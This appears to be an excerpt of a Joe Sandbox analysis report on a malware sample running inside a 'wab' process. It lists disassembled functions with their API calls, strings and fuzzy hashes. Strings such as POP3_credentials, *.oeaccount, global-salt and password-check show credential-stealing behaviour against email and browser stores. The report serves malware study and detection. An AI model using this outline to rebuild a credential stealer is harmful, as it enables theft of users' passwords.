                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                  • API String ID: 3510742995-3273207271
                  • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                  • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                  • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                  • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                  Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                    • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                    • Part of subcall function 00410863: memcpy.MSVCRT ref: 004108C3
                  • strchr.MSVCRT ref: 0040371F
                  • _mbscpy.MSVCRT ref: 00403748
                  • _mbscpy.MSVCRT ref: 00403758
                  • strlen.MSVCRT ref: 00403778
                  • sprintf.MSVCRT ref: 0040379C
                  • _mbscpy.MSVCRT ref: 004037B2
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                  • String ID: %s@gmail.com
                  • API String ID: 500647785-4097000612
                  • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                  • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                  • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                  • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                  Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 004094C8
                  • GetDlgCtrlID.USER32(?), ref: 004094D3
                  • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                  • memset.MSVCRT ref: 0040950C
                  • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                  • _strcmpi.MSVCRT ref: 00409531
                    • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                  • String ID: sysdatetimepick32
                  • API String ID: 3411445237-4169760276
                  • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                  • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                  • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                  • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                  Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                  • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                  • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                  • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                  • GetSysColor.USER32(0000000F), ref: 0040B472
                  • DeleteObject.GDI32(?), ref: 0040B4A6
                  • DeleteObject.GDI32(00000000), ref: 0040B4A9
                  • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: MessageSend$DeleteImageLoadObject$Color
                  • String ID:
                  • API String ID: 3642520215-0
                  • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                  • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                  • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                  • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                  Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                  Download Yara Rule
                  APIs
                  • GetSystemMetrics.USER32(00000011), ref: 004072E7
                  • GetSystemMetrics.USER32(00000010), ref: 004072ED
                  • GetDC.USER32(00000000), ref: 004072FB
                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                  • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                  • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                  • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                  • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                  • String ID:
                  • API String ID: 1999381814-0
                  • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                  • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                  • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                  • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                  Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpymemset
                  • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                  • API String ID: 1297977491-3883738016
                  • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                  • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                  • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                  • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                  Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                    • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                    • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                    • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                  • memcpy.MSVCRT ref: 0044972E
                  • memcpy.MSVCRT ref: 0044977B
                  • memcpy.MSVCRT ref: 004497F6
                    • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                    • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                  • memcpy.MSVCRT ref: 00449846
                  • memcpy.MSVCRT ref: 00449887
                  • memcpy.MSVCRT ref: 004498B8
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset
                  • String ID: gj
                  • API String ID: 438689982-4203073231
                  • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                  • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                  • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                  • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                  Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: __aulldvrm$__aullrem
                  • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                  • API String ID: 643879872-978417875
                  • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                  • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                  • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                  • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                  Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040810E
                    • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                  • LocalFree.KERNEL32(?,?,?,?,?,00000000,7508EB20,?), ref: 004081B9
                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                    • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                  • String ID: POP3_credentials$POP3_host$POP3_name
                  • API String ID: 524865279-2190619648
                  • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                  • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                  • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                  • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                  Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ItemMenu$CountInfomemsetstrchr
                  • String ID: 0$6
                  • API String ID: 2300387033-3849865405
                  • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                  • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                  • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                  • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                  Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpystrlen$memsetsprintf
                  • String ID: %s (%s)
                  • API String ID: 3756086014-1363028141
                  • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                  • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                  • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                  • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                  Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscat$memsetsprintf
                  • String ID: %2.2X
                  • API String ID: 125969286-791839006
                  • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                  • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                  • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                  • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                  Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                  • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                  • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                    • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                    • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                    • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                    • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                    • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                    • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                    • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                  • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                  • CloseHandle.KERNEL32(?), ref: 00444206
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                  • String ID: ACD
                  • API String ID: 1886237854-620537770
                  • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                  • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                  • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                  • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                  Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 004091EC
                  • sprintf.MSVCRT ref: 00409201
                    • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                    • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                    • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                  • SetWindowTextA.USER32(?,?), ref: 00409228
                  • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                  • String ID: caption$dialog_%d
                  • API String ID: 2923679083-4161923789
                  • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                  • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                  • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                  • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                  Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                  Download Yara Rule
                  APIs
                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                  • memset.MSVCRT ref: 00410246
                  • memset.MSVCRT ref: 00410258
                    • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                  • memset.MSVCRT ref: 0041033F
                  • _mbscpy.MSVCRT ref: 00410364
                  • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$_mbscpy$CloseHandleOpenProcess
                  • String ID:
                  • API String ID: 3974772901-0
                  • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                  • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                  • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                  • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                  Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                  Download Yara Rule
                  APIs
                  • wcslen.MSVCRT ref: 0044406C
                  • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                  • strlen.MSVCRT ref: 004440D1
                    • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                    • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                  • memcpy.MSVCRT ref: 004440EB
                  • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                  • String ID:
                  • API String ID: 577244452-0
                  • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                  • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                  • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                  • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                  Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                    • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                  • _strcmpi.MSVCRT ref: 00404518
                  • _strcmpi.MSVCRT ref: 00404536
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _strcmpi$memcpystrlen
                  • String ID: imap$pop3$smtp
                  • API String ID: 2025310588-821077329
                  • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                  • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                  • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                  • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                  Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040C02D
                    • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                    • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                    • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                    • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                    • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                    • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                    • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                    • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                    • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                    • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                    • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                  • API String ID: 2726666094-3614832568
                  • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                  • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                  • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                  • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                  Function 0040C143 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                  Download Yara Rule
                  APIs
                  • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                  • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                  • OpenClipboard.USER32(?), ref: 0040C1B1
                  • GetLastError.KERNEL32 ref: 0040C1CA
                  • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                  • String ID:
                  • API String ID: 2014771361-0
                  • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                  • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                  • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                  • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                  Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                  Download Yara Rule
                  APIs
                  • memcmp.MSVCRT ref: 00406151
                    • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                    • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                    • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                  • memcmp.MSVCRT ref: 0040617C
                  • memcmp.MSVCRT ref: 004061A4
                  • memcpy.MSVCRT ref: 004061C1
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcmp$memcpy
                  • String ID: global-salt$password-check
                  • API String ID: 231171946-3927197501
                  • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                  • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                  • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                  • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                  Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                  • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                  • Opcode Fuzzy Hash: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                  • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                  Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                  Download Yara Rule
                  APIs
                  • GetClientRect.USER32(?,?), ref: 004016A3
                  • GetSystemMetrics.USER32(00000015), ref: 004016B1
                  • GetSystemMetrics.USER32(00000014), ref: 004016BD
                  • BeginPaint.USER32(?,?), ref: 004016D7
                  • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
